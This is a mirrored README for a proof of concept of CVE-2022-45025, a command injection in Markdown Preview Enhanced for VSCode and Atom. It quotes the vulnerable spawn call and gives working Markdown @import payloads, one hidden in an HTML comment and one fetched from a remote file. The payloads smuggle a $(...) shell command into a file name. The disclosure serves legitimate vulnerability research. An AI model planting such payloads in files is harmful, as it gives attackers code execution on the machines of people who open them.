CVE 2022 45025 Save
[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)
Project README
CVE-2022-45025
Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)
Description
The Mume markdown tool library was vulnerable to command injection due to use of spawn command with {shell: true} option. This could allow an attacker to achieve arbitary code execution by tricking victim into opening specially crafted Markdown file using VSCode or Atom. The library powers Markdown Preview Enhanced plugin for both VSCode and Atom.
Vulnerable code snippet:
const task = spawn(
"pdf2svg",
[
`"${pdfFilePath}"`,
`"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
"all",
],
{ shell: true },
)
Proof of Concept
The following Markdown document allows an attacker to execute arbitary command:
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"
The following comment will be recognised by MPE as valid "@import" command:
<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->
Alternatively, the payload could be executed from external source:
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->
DEMO for both VSCode and Atom on YouTube.
Support
Open Source Agenda is not affiliated with "CVE 2022 45025" Project. README Source: yuriisanin/CVE-2022-45025
Stars
89
Open Issues
0
Last Commit
1 year ago
Repository
Open Source Agenda Badge
